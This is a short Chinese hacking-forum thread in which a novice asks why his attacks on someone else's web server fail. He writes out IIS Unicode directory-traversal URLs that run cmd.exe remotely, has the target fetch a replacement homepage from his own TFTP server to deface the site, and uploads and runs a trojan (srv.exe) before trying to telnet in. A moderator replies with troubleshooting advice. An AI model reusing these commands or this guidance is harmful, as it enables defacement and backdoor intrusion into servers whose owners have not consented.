论坛: 菜鸟乐园 标题: 我利用unicode漏洞时遇到的问题。。。。 复制本贴地址    
作者: hellosnake [hellosnake]    论坛用户   登录
我利用unicode漏洞时遇到的问题。。。。

我在我台机子上运行tftpd32.exe
然后用http://网站ip/scripts/..%c0%a9c../winnt/system32/cmd.exe?/c+tftp+-I+我的IP+GET+HEI.HTM+ c:\\inetpub\\wwwroot\\index.htm  这样黑它的主页。。但TFTPD32。EXE没有反应。。。在它的WWWROOT里也看不到我上传的主页。。我在它的
wwwroot里有写权限。。我要上传的主页也在我的tftpd32的目录。。
但不知为什么tftpd32就是没有反应!!!
  请教各路高手。。。。小弟这里有礼了。。。。




地主 发表时间: 1/12 2:3

回复: syshunter [syshunter]   版主   登录
你要在TFTP32服务器上绑定的是你的外部IP,内部自定义IP客户端是不能直接访问的。

B1层 发表时间: 1/12 8:1

回复: group [group]   论坛用户   登录
高见

B2层 发表时间: 1/13 0:43

回复: hellosnake [hellosnake]   论坛用户   登录
请问何为外部IP。。是不是我用WINIPCFG查到的我的IP???
还有请问:我后来用ECHO上传了我的木马:SRV。EXE至它的SCRIPT目录下。。
成功。。但我就是不能执行它。。。用http://远程ip/scripts/srv.exe
或:http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\srv.exe
然后:telnet xxxxx 99
但不行!!!!!WHY。。。。。
    请教各路高手。。。。小弟这里有礼了。。。。 


B3层 发表时间: 1/13 1:14

回复: xjliuwei [xjliuwei]   论坛用户   登录
有道理!我战成! 

B4层 发表时间: 04-06-09 06:32

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号